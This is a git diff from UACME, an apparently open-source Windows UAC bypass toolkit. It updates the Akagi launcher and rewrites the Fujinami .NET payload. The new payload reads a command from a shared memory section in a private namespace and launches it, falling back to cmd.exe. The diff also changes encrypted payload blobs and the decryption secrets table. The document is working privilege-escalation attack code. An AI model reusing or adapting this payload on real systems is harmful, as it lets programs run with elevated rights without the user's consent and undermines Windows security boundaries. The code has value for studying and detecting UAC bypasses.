diff --git a/Source/Akagi/bin/Akatsuki64.cd b/Source/Akagi/bin/Akatsuki64.cd
index b2327b9..57e70a6 100644
Binary files a/Source/Akagi/bin/Akatsuki64.cd and b/Source/Akagi/bin/Akatsuki64.cd differ
diff --git a/Source/Akagi/bin/Chiyoda64.cd b/Source/Akagi/bin/Chiyoda64.cd
index c1ff0d7..8103f7d 100644
Binary files a/Source/Akagi/bin/Chiyoda64.cd and b/Source/Akagi/bin/Chiyoda64.cd differ
diff --git a/Source/Akagi/bin/Fujinami.cd b/Source/Akagi/bin/Fujinami.cd
index 7f4a8cc..f913472 100644
Binary files a/Source/Akagi/bin/Fujinami.cd and b/Source/Akagi/bin/Fujinami.cd differ
diff --git a/Source/Akagi/bin/Ikazuchi32.cd b/Source/Akagi/bin/Ikazuchi32.cd
index 8b09fa2..4751bf5 100644
Binary files a/Source/Akagi/bin/Ikazuchi32.cd and b/Source/Akagi/bin/Ikazuchi32.cd differ
diff --git a/Source/Akagi/bin/Ikazuchi64.cd b/Source/Akagi/bin/Ikazuchi64.cd
index 6c4fad8..4d826ae 100644
Binary files a/Source/Akagi/bin/Ikazuchi64.cd and b/Source/Akagi/bin/Ikazuchi64.cd differ
diff --git a/Source/Akagi/bin/Kamikaze.cd b/Source/Akagi/bin/Kamikaze.cd
index 766678a..cb8b678 100644
Binary files a/Source/Akagi/bin/Kamikaze.cd and b/Source/Akagi/bin/Kamikaze.cd differ
diff --git a/Source/Akagi/bin/fubuki32.cd b/Source/Akagi/bin/fubuki32.cd
index f67c8b3..1b9bff8 100644
Binary files a/Source/Akagi/bin/fubuki32.cd and b/Source/Akagi/bin/fubuki32.cd differ
diff --git a/Source/Akagi/bin/fubuki64.cd b/Source/Akagi/bin/fubuki64.cd
index a728caa..3905627 100644
Binary files a/Source/Akagi/bin/fubuki64.cd and b/Source/Akagi/bin/fubuki64.cd differ
diff --git a/Source/Akagi/bin/hibiki32.cd b/Source/Akagi/bin/hibiki32.cd
index def39b8..0834a57 100644
Binary files a/Source/Akagi/bin/hibiki32.cd and b/Source/Akagi/bin/hibiki32.cd differ
diff --git a/Source/Akagi/bin/hibiki64.cd b/Source/Akagi/bin/hibiki64.cd
index b84cb31..1dc094e 100644
Binary files a/Source/Akagi/bin/hibiki64.cd and b/Source/Akagi/bin/hibiki64.cd differ
diff --git a/Source/Akagi/bin/kongou32.cd b/Source/Akagi/bin/kongou32.cd
index 7e191a5..726f491 100644
Binary files a/Source/Akagi/bin/kongou32.cd and b/Source/Akagi/bin/kongou32.cd differ
diff --git a/Source/Akagi/bin/kongou64.cd b/Source/Akagi/bin/kongou64.cd
index 53c654b..cab4a75 100644
Binary files a/Source/Akagi/bin/kongou64.cd and b/Source/Akagi/bin/kongou64.cd differ
diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c
index 9548b77..c25124a 100644
--- a/Source/Akagi/methods/methods.c
+++ b/Source/Akagi/methods/methods.c
@@ -6,7 +6,7 @@
*
* VERSION: 3.10
*
-* DATE: 11 Nov 2018
+* DATE: 13 Nov 2018
*
* UAC bypass dispatch.
*
@@ -384,21 +384,7 @@ BOOL MethodsManagerCall(
// 2. Optional parameter from Akagi command line.
//
if (Entry->SetParameters) {
- //
- // Special case for dotnet unit.
- // Reimplementation pending.
- //
- if (Entry->PayloadResourceId == FUJINAMI_ID) {
- if (g_ctx.OptionalParameterLength != 0) {
- supSetParameter(
- (LPWSTR)&g_ctx.szOptionalParameter,
- (DWORD)(g_ctx.OptionalParameterLength * sizeof(WCHAR))
- );
- }
- }
- else {
- bParametersBlockSet = supCreateSharedParametersBlock();
- }
+ bParametersBlockSet = supCreateSharedParametersBlock();
}
bResult = (BOOL)Entry->Routine(&ParamsBlock);
diff --git a/Source/Akagi/secrets.h b/Source/Akagi/secrets.h
index abab080..d08c5ea 100644
--- a/Source/Akagi/secrets.h
+++ b/Source/Akagi/secrets.h
@@ -6,7 +6,7 @@
*
* VERSION: 3.10
*
-* DATE: 11 Nov 2018
+* DATE: 13 Nov 2018
*
* Secrets used for decryption.
*
@@ -40,9 +40,9 @@ static const unsigned char g_bSecrets[288] = {
0x46, 0x30, 0xB9, 0x80, 0x26, 0x6C, 0x0E, 0x18, 0xE4, 0xF3, 0x97, 0x1B, 0x9C, 0xCE, 0x9F, 0x3F,
0x09, 0xC2, 0x85, 0x0B, 0xE0, 0x4F, 0xDA, 0x57, 0xF7, 0xF7, 0xBB, 0x8F, 0x0E, 0x53, 0xF4, 0xD8,
0xF8, 0x1A, 0x4F, 0xFF, 0x24, 0xDA, 0xFF, 0x66, 0xA2, 0x18, 0x5D, 0xBC, 0xA8, 0xBE, 0x28, 0x6D,
- 0x6E, 0x7F, 0x9A, 0x2E, 0x7F, 0x2D, 0x5A, 0xB5, 0x2C, 0x25, 0xEE, 0xEA, 0xC2, 0xA6, 0xBA, 0x80,
- 0xC2, 0x73, 0xC8, 0xB6, 0x39, 0xFD, 0x9A, 0xF1, 0x6F, 0x77, 0x24, 0x42, 0x34, 0xE2, 0xF9, 0x6B,
- 0xC8, 0xEA, 0x3A, 0xAC, 0x7F, 0x0C, 0x47, 0xC5, 0x01, 0xD6, 0xAD, 0x5B, 0x25, 0x28, 0x53, 0xC6,
+ 0x6E, 0x7F, 0x9A, 0x2E, 0x7F, 0x2D, 0x5A, 0xB5, 0x45, 0x60, 0x51, 0xD6, 0x3F, 0x7B, 0x15, 0xC2,
+ 0x77, 0x8D, 0x29, 0xDC, 0xDE, 0xE1, 0xED, 0x7B, 0x78, 0xC8, 0xEE, 0x7C, 0x49, 0x69, 0xB7, 0xAF,
+ 0xF9, 0x05, 0x78, 0x47, 0x01, 0x63, 0x77, 0x13, 0x01, 0xD6, 0xAD, 0x5B, 0x25, 0x28, 0x53, 0xC6,
0x68, 0xE0, 0x78, 0xBA, 0xA4, 0x5B, 0x0C, 0x93, 0x10, 0xC9, 0xF7, 0xDB, 0x65, 0x03, 0x20, 0xB0,
0x24, 0x43, 0xA1, 0x1D, 0x19, 0x9B, 0x13, 0x81, 0x19, 0x3F, 0xDE, 0x19, 0x48, 0x93, 0x27, 0x4F,
0xF1, 0xC9, 0xDF, 0x0F, 0x30, 0x4C, 0xDF, 0x75, 0xAB, 0xEA, 0x72, 0x51, 0x2C, 0x56, 0x42, 0x3C,
@@ -57,8 +57,8 @@ static const unsigned char g_bSecrets[180] = {
0x20, 0x06, 0x6F, 0x70, 0xD2, 0xBD, 0x76, 0x74, 0xA4, 0xDC, 0xB9, 0x73, 0x08, 0x93, 0xEE, 0x05,
0x31, 0xAF, 0xE1, 0x5F, 0x01, 0x42, 0x89, 0x10, 0xDD, 0x79, 0x8E, 0xE6, 0x2E, 0x82, 0x02, 0xDB,
0x2E, 0xB2, 0x99, 0x81, 0x1B, 0xA8, 0x15, 0xD5, 0x53, 0xFD, 0xC9, 0x92, 0x2A, 0xCC, 0x98, 0x30,
- 0x26, 0x31, 0xC6, 0xBA, 0x62, 0xE7, 0x38, 0x85, 0xC8, 0x67, 0xE0, 0xE6, 0x99, 0xBC, 0x19, 0xF6,
- 0x60, 0x69, 0x18, 0x3A, 0xC4, 0x03, 0x3A, 0xEC, 0xC7, 0xF4, 0x06, 0xD4, 0x8F, 0xED, 0x85, 0x40,
+ 0x4F, 0x74, 0x79, 0x86, 0x9F, 0x3A, 0x97, 0xC7, 0x7D, 0x99, 0x01, 0x8C, 0x7E, 0xA0, 0x6E, 0x7C,
+ 0x77, 0xD6, 0xD2, 0x04, 0xB9, 0x88, 0x74, 0x28, 0xF6, 0x1B, 0x44, 0x3F, 0xF1, 0x82, 0xB5, 0x96,
0x9F, 0x3D, 0x7A, 0xF4, 0x5D, 0x82, 0xDA, 0x88, 0x0C, 0x79, 0x48, 0xD3, 0x51, 0x7B, 0x39, 0x77,
0x76, 0x3A, 0xF8, 0xBD, 0xA9, 0xC5, 0x11, 0xBF, 0xC7, 0x86, 0xDD, 0xA2, 0x49, 0xE9, 0x28, 0x1C,
0xF6, 0x97, 0x26, 0x75
diff --git a/Source/Akagi/sup.c b/Source/Akagi/sup.c
index 9849b22..08943e7 100644
--- a/Source/Akagi/sup.c
+++ b/Source/Akagi/sup.c
@@ -6,7 +6,7 @@
*
* VERSION: 3.10
*
-* DATE: 11 Nov 2018
+* DATE: 13 Nov 2018
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -1026,42 +1026,6 @@ LPWSTR supQueryEnvironmentVariableOffset(
return (ptr + Value->Length / sizeof(WCHAR));
}
-/*
-* supSetParameter
-*
-* Purpose:
-*
-* Set parameter for payload execution.
-*
-*/
-BOOL supSetParameter(
- _In_ LPWSTR lpParameter,
- _In_ DWORD cbParameter
-)
-{
- BOOL bResult = FALSE;
- HKEY hKey = NULL;
- LRESULT lRet;
-
- lRet = RegCreateKeyEx(HKEY_CURRENT_USER, T_AKAGI_KEY, 0, NULL,
- REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
-
- if ((lRet == ERROR_SUCCESS) && (hKey != NULL)) {
-
- //
- // Write optional parameter.
- //
- lRet = RegSetValueEx(hKey, T_AKAGI_PARAM, 0, REG_SZ,
- (LPBYTE)lpParameter, cbParameter);
-
- bResult = (lRet == ERROR_SUCCESS);
-
- RegCloseKey(hKey);
- }
-
- return bResult;
-}
-
/*
* supChkSum
*
diff --git a/Source/Akagi/sup.h b/Source/Akagi/sup.h
index 63f9b89..6593410 100644
--- a/Source/Akagi/sup.h
+++ b/Source/Akagi/sup.h
@@ -6,7 +6,7 @@
*
* VERSION: 3.10
*
-* DATE: 11 Nov 2018
+* DATE: 13 Nov 2018
*
* Common header file for the program support routines.
*
@@ -132,10 +132,6 @@ DWORD supQueryEntryPointRVA(
LPWSTR supQueryEnvironmentVariableOffset(
_In_ PUNICODE_STRING Value);
-BOOL supSetParameter(
- _In_ LPWSTR lpParameter,
- _In_ DWORD cbParameter);
-
DWORD supCalculateCheckSumForMappedFile(
_In_ PVOID BaseAddress,
_In_ ULONG FileLength);
diff --git a/Source/Akagi/uacme.vcxproj.user b/Source/Akagi/uacme.vcxproj.user
index 05af7d1..12378a5 100644
--- a/Source/Akagi/uacme.vcxproj.user
+++ b/Source/Akagi/uacme.vcxproj.user
@@ -23,7 +23,7 @@
WindowsLocalDebugger
- 52
+ 0
WindowsLocalDebugger
\ No newline at end of file
diff --git a/Source/Fujinami/EntryPoint.cs b/Source/Fujinami/EntryPoint.cs
index b123cfa..e8403c6 100644
--- a/Source/Fujinami/EntryPoint.cs
+++ b/Source/Fujinami/EntryPoint.cs
@@ -1,51 +1,170 @@
-using System;
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2018
+*
+* TITLE: FUJINAMI.CS
+*
+* VERSION: 3.10
+*
+* DATE: 13 Nov 2018
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+using System;
using System.Diagnostics;
-using Microsoft.Win32;
+using System.Runtime.InteropServices;
//
// Fujinami payload code
//
-// Simplified version of old Fubuki version.
// Read registry value with custom parameter and execute it.
//
namespace Fujinami
{
public class EntryPoint
{
+ ///
+ /// Program entry point.
+ ///
static EntryPoint()
{
- Debug.Write("Ready, fire!");
-
- string CustomParam = string.Empty;
-
try
{
- RegistryKey Key = Registry.CurrentUser.OpenSubKey("Software\\Akagi", false);
- CustomParam = Key.GetValue("LoveLetter").ToString();
- Key.Close();
+ Debug.Write("Ready, fire!");
- } catch {
- //
- // Suppress any errors.
- //
- CustomParam = null;
- }
+ bool bSharedParamsReadOk = false;
+ IntPtr BoundaryDescriptor = NativeMethods.CreateBoundaryDescriptorW("ArisuTsuberuku", 0);
+ if (BoundaryDescriptor == IntPtr.Zero)
+ return;
- if (CustomParam == null)
- CustomParam = "cmd.exe";
+ IntPtr domainSid = IntPtr.Zero;
+ IntPtr pSid = IntPtr.Zero;
+ uint cbSid = 0;
- try
- {
- Process.Start(CustomParam);
+ NativeMethods.CreateWellKnownSid(NativeMethods.WELL_KNOWN_SID_TYPE.WinWorldSid, domainSid, pSid, ref cbSid);
+
+ pSid = Marshal.AllocHGlobal(Convert.ToInt32(cbSid));
+
+ if (!NativeMethods.CreateWellKnownSid(
+ NativeMethods.WELL_KNOWN_SID_TYPE.WinWorldSid,
+ domainSid,
+ pSid,
+ ref cbSid))
+ {
+ return;
+ }
+
+ if (!NativeMethods.AddSIDToBoundaryDescriptor(ref BoundaryDescriptor, pSid))
+ return;
+
+ IntPtr hPrivateNamespace = NativeMethods.OpenPrivateNamespaceW(BoundaryDescriptor, "AkagiIsoSpace");
+
+ Marshal.FreeHGlobal(pSid);
+ NativeMethods.DeleteBoundaryDescriptor(BoundaryDescriptor);
+
+ if (hPrivateNamespace == IntPtr.Zero)
+ return;
+
+ IntPtr hSection = IntPtr.Zero;
+
+ NativeMethods.OBJECT_ATTRIBUTES oa = new NativeMethods.OBJECT_ATTRIBUTES(
+ "AkagiSharedSection",
+ NativeMethods.ObjectFlags.CaseInsensitive,
+ hPrivateNamespace);
+
+ NativeMethods.NtStatus Status = NativeMethods.NtOpenSection(
+ out hSection,
+ NativeMethods.SectionAccess.MapRead,
+ ref oa);
+
+ if (NativeMethods.IsSuccess(Status))
+ {
+ IntPtr BaseAddress = IntPtr.Zero;
+ IntPtr ViewSize = new IntPtr(0x1000);
+ long sectionOffset = 0;
+
+ Status = NativeMethods.NtMapViewOfSection(
+ hSection,
+ NativeMethods.GetCurrentProcess(),
+ ref BaseAddress,
+ IntPtr.Zero,
+ new IntPtr(0x1000),
+ ref sectionOffset,
+ ref ViewSize,
+ NativeMethods.SectionInherit.ViewUnmap,
+ NativeMethods.MemoryFlags.TopDown,
+ NativeMethods.MemoryProtection.ReadOnly);
+
+ if (NativeMethods.IsSuccess(Status))
+ {
+ Int32 StructSize = Marshal.SizeOf(typeof(NativeMethods.SHARED_PARAMS));
+ byte[] rawData = new byte[StructSize];
+ Marshal.Copy(BaseAddress, rawData, 0, StructSize);
+
+ NativeMethods.SHARED_PARAMS SharedParams = (NativeMethods.SHARED_PARAMS)
+ Marshal.PtrToStructure(
+ Marshal.UnsafeAddrOfPinnedArrayElement(rawData, 0),
+ typeof(NativeMethods.SHARED_PARAMS));
+
+ NativeMethods.NtUnmapViewOfSection(hSection, BaseAddress);
+
+ var Crc32 = SharedParams.Crc32;
+ SharedParams.Crc32 = 0;
+
+ var StructPtr = Marshal.AllocHGlobal(StructSize);
+
+ Marshal.StructureToPtr(SharedParams, StructPtr, false);
+
+ bSharedParamsReadOk = (Crc32 == NativeMethods.RtlComputeCrc32(0, StructPtr, Convert.ToUInt32(StructSize)));
+
+ Marshal.FreeHGlobal(StructPtr);
+
+ var PayloadToExecute = string.Empty;
+
+ if (bSharedParamsReadOk)
+ {
+ PayloadToExecute = SharedParams.szParameter;
+ }
+
+ if (PayloadToExecute == string.Empty)
+ PayloadToExecute = "cmd.exe";
+
+ Process.Start(PayloadToExecute);
+
+ if (bSharedParamsReadOk)
+ {
+ IntPtr hEvent = IntPtr.Zero;
+
+ NativeMethods.OBJECT_ATTRIBUTES oae = new NativeMethods.OBJECT_ATTRIBUTES(
+ SharedParams.szSignalObject,
+ NativeMethods.ObjectFlags.CaseInsensitive,
+ hPrivateNamespace);
+
+ Status = NativeMethods.NtOpenEvent(out hEvent, NativeMethods.EventAccess.AllAccess, ref oae);
+ if (NativeMethods.IsSuccess(Status))
+ {
+ int prev = 0;
+ NativeMethods.NtSetEvent(hEvent, out prev);
+ NativeMethods.NtClose(hEvent);
+ }
+ }
+ }
+ NativeMethods.NtClose(hSection);
+ }
+ NativeMethods.ClosePrivateNamespace(hPrivateNamespace, 0);
}
catch
{
- //
- // Suppress any errors.
- //
Environment.Exit(0);
}
+ Debug.Write("Bye!");
+
Environment.Exit(0);
}
}
diff --git a/Source/Fujinami/Fujinami.csproj b/Source/Fujinami/Fujinami.csproj
index 140c434..7837dbd 100644
--- a/Source/Fujinami/Fujinami.csproj
+++ b/Source/Fujinami/Fujinami.csproj
@@ -42,6 +42,18 @@
+
+ True
+ True
+ Resources.resx
+
+
+
+
+
+ ResXFileCodeGenerator
+ Resources.Designer.cs
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ text/microsoft-resx
+
+
+ 1.3
+
+
+ System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.3500.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.3500.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
\ No newline at end of file
diff --git a/Source/Fujinami/WinNT.cs b/Source/Fujinami/WinNT.cs
new file mode 100644
index 0000000..389b295
--- /dev/null
+++ b/Source/Fujinami/WinNT.cs
@@ -0,0 +1,319 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2018
+*
+* TITLE: NATIVEMETHODS.CS
+*
+* VERSION: 1.0.1.0
+*
+* DATE: 11 Nov 2018
+*
+* Unmanaged API definitions and prototypes.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+using System;
+using System.Runtime.InteropServices;
+
+namespace Fujinami
+{
+ public static class NativeMethods
+ {
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+ public struct SHARED_PARAMS
+ {
+ public UInt32 Crc32;
+ public UInt32 SessionId;
+ public UInt32 AkagiFlag;
+ [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 261)]
+ public string szParameter;
+ [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 261)]
+ public string szDesktop;
+ [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 261)]
+ public string szWinstation;
+ [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 261)]
+ public string szSignalObject;
+ }
+
+ public enum WELL_KNOWN_SID_TYPE
+ {
+ WinWorldSid = 1
+ }
+
+ public const Int32 SECURITY_MAX_SID_SIZE = 68;
+
+ public enum NtStatus : UInt32
+ {
+ Success = 0x00000000,
+ Informational = 0x40000000,
+ Warning = 0x80000000,
+ Error = 0xc0000000,
+ MaximumNtStatus = 0xffffffff
+ }
+
+ public static bool IsSuccess(NtStatus status) => status >= NtStatus.Success && status < NtStatus.Informational;
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ public static extern IntPtr GetCurrentProcess();
+
+ [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
+ public static extern IntPtr OpenPrivateNamespaceW(
+ [In] IntPtr lpBoundaryDescriptor,
+ [In] [MarshalAs(UnmanagedType.LPWStr)] string lpAliasPrefix);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ public static extern bool ClosePrivateNamespace(
+ [In] IntPtr Handle,
+ [In] UInt32 Flags);
+
+ [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
+ public static extern IntPtr CreateBoundaryDescriptorW(
+ [In] [MarshalAs(UnmanagedType.LPWStr)] string Name,
+ [In] UInt32 Flags);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ public static extern void DeleteBoundaryDescriptor(
+ [In] IntPtr BoundaryDescriptor);
+
+ [DllImport("advapi32.dll", SetLastError = true)]
+ public static extern bool CreateWellKnownSid(
+ [In] WELL_KNOWN_SID_TYPE WellKnownSidType,
+ [In] IntPtr DomainSid,
+ [In] IntPtr pSid,
+ ref UInt32 cbSid);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ public static extern bool AddSIDToBoundaryDescriptor(
+ ref IntPtr BoundaryDescriptor,
+ [In] IntPtr RequiredSid);
+
+ [Flags]
+ public enum ObjectFlags : UInt32
+ {
+ Inherit = 0x2,
+ Permanent = 0x10,
+ Exclusive = 0x20,
+ CaseInsensitive = 0x40,
+ OpenIf = 0x80,
+ OpenLink = 0x100,
+ KernelHandle = 0x200,
+ ForceAccessCheck = 0x400,
+ ValidAttributes = 0x7f2
+ }
+
+ [StructLayout(LayoutKind.Sequential)]
+ public struct UNICODE_STRING : IDisposable
+ {
+ public ushort Length;
+ public ushort MaximumLength;
+ private IntPtr buffer;
+
+ public UNICODE_STRING(string s)
+ {
+ Length = (ushort)(s.Length * 2);
+ MaximumLength = (ushort)(Length + 2);
+ buffer = Marshal.StringToHGlobalUni(s);
+ }
+
+ public void Dispose()
+ {
+ Marshal.FreeHGlobal(buffer);
+ buffer = IntPtr.Zero;
+ }
+
+ public override string ToString()
+ {
+ return Marshal.PtrToStringUni(buffer);
+ }
+ }
+
+ [StructLayout(LayoutKind.Sequential)]
+ public struct OBJECT_ATTRIBUTES : IDisposable
+ {
+ public int Length;
+ public IntPtr RootDirectory;
+ private IntPtr objectName;
+ public ObjectFlags Attributes;
+ private IntPtr SecurityDescriptor;
+ private IntPtr SecurityQualityOfService;
+
+ public OBJECT_ATTRIBUTES(string name, ObjectFlags attrs, IntPtr root)
+ {
+ Length = 0;
+ RootDirectory = root;
+ objectName = IntPtr.Zero;
+ Attributes = attrs;
+ SecurityDescriptor = IntPtr.Zero;
+ SecurityQualityOfService = IntPtr.Zero;
+
+ Length = Marshal.SizeOf(this);
+ ObjectName = new UNICODE_STRING(name);
+ }
+
+ public UNICODE_STRING ObjectName
+ {
+ get
+ {
+ return (UNICODE_STRING)Marshal.PtrToStructure(
+ objectName, typeof(UNICODE_STRING));
+ }
+
+ set
+ {
+ bool fDeleteOld = objectName != IntPtr.Zero;
+ if (!fDeleteOld)
+ objectName = Marshal.AllocHGlobal(Marshal.SizeOf(value));
+ Marshal.StructureToPtr(value, objectName, fDeleteOld);
+ }
+ }
+
+ public void Dispose()
+ {
+ if (objectName != IntPtr.Zero)
+ {
+ Marshal.DestroyStructure(objectName, typeof(UNICODE_STRING));
+ Marshal.FreeHGlobal(objectName);
+ objectName = IntPtr.Zero;
+ }
+ }
+ }
+
+ [Flags]
+ public enum StandardRights : UInt32
+ {
+ Delete = 0x00010000,
+ ReadControl = 0x00020000,
+ WriteDac = 0x00040000,
+ WriteOwner = 0x00080000,
+ Synchronize = 0x00100000,
+ Required = 0x000f0000,
+ Read = ReadControl,
+ Write = ReadControl,
+ Execute = ReadControl,
+ All = 0x001f0000,
+
+ SpecificRightsAll = 0x0000ffff,
+ AccessSystemSecurity = 0x01000000,
+ MaximumAllowed = 0x02000000,
+ GenericRead = 0x80000000,
+ GenericWrite = 0x40000000,
+ GenericExecute = 0x20000000,
+ GenericAll = 0x10000000
+ }
+
+ [Flags]
+ public enum SectionAccess : UInt32
+ {
+ Query = 0x0001,
+ MapWrite = 0x0002,
+ MapRead = 0x0004,
+ MapExecute = 0x0008,
+ ExtendSize = 0x0010,
+ MapExecuteExplicit = 0x0020,
+ AllAccess = StandardRights.Required | Query | MapWrite | MapRead | MapExecute | ExtendSize
+ }
+
+ public enum SectionInherit : Int32
+ {
+ ViewShare = 1,
+ ViewUnmap = 2
+ }
+
+ [Flags]
+ public enum MemoryFlags : UInt32
+ {
+ Commit = 0x1000,
+ Reserve = 0x2000,
+ Decommit = 0x4000,
+ Release = 0x8000,
+ Free = 0x10000,
+ Private = 0x20000,
+ Mapped = 0x40000,
+ Reset = 0x80000,
+ TopDown = 0x100000,
+ WriteWatch = 0x200000,
+ Physical = 0x400000,
+ LargePages = 0x20000000,
+ DosLimit = 0x40000000,
+ FourMbPages = 0x80000000
+ }
+
+ [Flags]
+ public enum MemoryProtection : UInt32
+ {
+ AccessDenied = 0x0,
+ Execute = 0x10,
+ ExecuteRead = 0x20,
+ ExecuteReadWrite = 0x40,
+ ExecuteWriteCopy = 0x80,
+ Guard = 0x100,
+ NoCache = 0x200,
+ WriteCombine = 0x400,
+ NoAccess = 0x01,
+ ReadOnly = 0x02,
+ ReadWrite = 0x04,
+ WriteCopy = 0x08
+ }
+
+ [Flags]
+ public enum EventAccess : UInt32
+ {
+ QueryState = 0x1,
+ ModifyState = 0x2,
+ AllAccess = StandardRights.Required | StandardRights.Synchronize |
+ QueryState | ModifyState
+ }
+
+
+ [DllImport("ntdll.dll")]
+ public static extern NtStatus NtClose(
+ [In] IntPtr hObject);
+
+ [DllImport("ntdll.dll")]
+ public static extern NtStatus NtOpenSection(
+ [Out] out IntPtr SectionHandle,
+ [In] SectionAccess DesiredAccess,
+ [In] ref OBJECT_ATTRIBUTES ObjectAttributes);
+
+ [DllImport("ntdll.dll")]
+ public static extern NtStatus NtMapViewOfSection(
+ [In] IntPtr SectionHandle,
+ [In] IntPtr ProcessHandle,
+ ref IntPtr BaseAddress,
+ [In] IntPtr ZeroBits,
+ [In] IntPtr CommitSize,
+ [Optional] ref long SectionOffset,
+ ref IntPtr ViewSize,
+ [In] SectionInherit InheritDisposition,
+ [In] MemoryFlags AllocationType,
+ [In] MemoryProtection Win32Protect);
+
+ [DllImport("ntdll.dll")]
+ public static extern NtStatus NtUnmapViewOfSection(
+ [In] IntPtr ProcessHandle,
+ [In] IntPtr BaseAddress);
+
+ [DllImport("ntdll.dll")]
+ public static extern UInt32 RtlComputeCrc32(
+ [In] UInt32 PartialCrc,
+ [In] IntPtr Buffer,
+ [In] UInt32 Length);
+
+ [DllImport("ntdll.dll")]
+ public static extern NtStatus NtOpenEvent(
+ [Out] out IntPtr EventHandle,
+ [In] EventAccess DesiredAccess,
+ [In] ref OBJECT_ATTRIBUTES ObjectAttributes);
+
+ [DllImport("ntdll.dll")]
+ public static extern NtStatus NtSetEvent(
+ [In] IntPtr EventHandle,
+ [Out] [Optional] out int PreviousState);
+
+ }
+}
diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h
index 32ea587..7dd7a8a 100644
--- a/Source/Shared/consts.h
+++ b/Source/Shared/consts.h
@@ -6,7 +6,7 @@
*
* VERSION: 3.10
*
-* DATE: 11 Nov 2018
+* DATE: 13 Nov 2018
*
* Global consts definition file.
*
@@ -224,11 +224,6 @@
#define WOW64STRING L"Wow64 detected, use x64 version of this tool."
#define WOW64WIN32ONLY L"This method only works with x86-32 Windows or from Wow64"
#define UACFIX L"This method fixed/unavailable in the current version of Windows, do you still want to continue?"
-#define T_AKAGI_KEY L"Software\\Akagi"
-#define T_AKAGI_PARAM L"LoveLetter"
-#define T_AKAGI_FLAG L"Flag"
-#define T_AKAGI_SESSION L"SessionId"
-#define T_AKAGI_DESKTOP L"Desktop"
#define T_VOLATILE_ENV L"Volatile Environment"
#define T_SYSTEMROOT_VAR L"SYSTEMROOT"
#define T_REGISTRY_PREP L"\\REGISTRY\\" //end slash included
diff --git a/UACME.sha256 b/UACME.sha256
index 6f9825c..9f3408a 100644
--- a/UACME.sha256
+++ b/UACME.sha256
@@ -17,25 +17,25 @@ bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\m
f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
41e356533943def6051a43b038c7373eddb9a8ddee8c8bceb334afe68c01fb71 *Source\Akagi\Resource.rc
-cfc8f5d323e494e1e94a2d46a981b0c51637b5f9c8bf3bf5e12d2ab8e1e72cc2 *Source\Akagi\secrets.h
-4fc09cca516505c14cd24c18c44d82b52a695bd212f4233040bf11b5c37c184d *Source\Akagi\sup.c
-4774bf0445d79d31601b813672065ec63d858cb0c0ccb3a0eedc99cdeab54bb5 *Source\Akagi\sup.h
+eb45f0d669e0aeb8a2d93b01d49edf436aaed4120bb9fd0675a0a7bb5b7a6760 *Source\Akagi\secrets.h
+27dd10a306a85abf640cc69bcfb910260dc2f8817cbac41c6b1f6313aa624ecf *Source\Akagi\sup.c
+d3f23308eaae8bc2b327e8289deb68ab9f93eaebf92739d7600c161674dff690 *Source\Akagi\sup.h
a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress
29433a8f69137f2921af02b6027b75a5f13eb3bec9514768f2db48916b55c433 *Source\Akagi\uacme.vcxproj
516f7cf09b4e643e03df1632662ffa124c16b24c23d81b19d405ebad49ea1262 *Source\Akagi\uacme.vcxproj.filters
-1db3658f964e6504bf85e63395f2588ecd04f7a44577e4e61e72d2fee1d7738d *Source\Akagi\uacme.vcxproj.user
-f50ec7aba17c0b76a7603ec0207cf4d7903b50c535f346c1e458b1e3c9a7885c *Source\Akagi\bin\Akatsuki64.cd
-8b7b192024f1e7e347b10bbfc89cd90bd44d8694466b0c32ad4b36ccc8b9dbcf *Source\Akagi\bin\Chiyoda64.cd
-adc3a90536bf15018da57b5a25851b0724b20ae6bd083fd2ebd598d7a8081b12 *Source\Akagi\bin\Fubuki32.cd
-4628acaf0336d4019282a52e3a7da431c0c48b4bf0dcd0cf5e5170c177a2b9df *Source\Akagi\bin\Fubuki64.cd
-5f605cbdf5d2df31e7a947fe1aad2854949a8ed4492a5c75bbd354a05dee06da *Source\Akagi\bin\Fujinami.cd
